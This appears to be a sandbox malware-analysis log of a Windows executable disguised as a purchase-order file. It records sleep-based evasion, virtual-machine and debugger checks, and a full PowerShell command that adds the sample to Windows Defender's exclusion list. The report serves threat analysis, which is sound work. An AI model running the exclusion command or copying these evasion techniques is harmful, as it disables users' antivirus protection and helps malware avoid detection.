Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597244	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597028	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6153	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3595	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Window / User API: threadDelayed 2135	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Window / User API: threadDelayed 7727	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7696	Thread sleep count: 2135 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599868s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7696	Thread sleep count: 7727 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598997s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597244s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -597028s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7832	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599868	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597244	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597028	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595280	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1hbin@
Source: svchost.exe, 00000005.00000002.2365316585.00000202B3E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0vB
Source: Amcache.hve.15.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000005.00000002.2366558664.00000202B945A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2366464053.00000202B9420000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1245555922.00000202B9420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.15.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.15.dr	Binary or memory string: vmci.sys
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1139961156.0000000009179000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.15.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Code function: 4_2_066A9668 LdrInitializeThunk,

4_2_066A9668

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
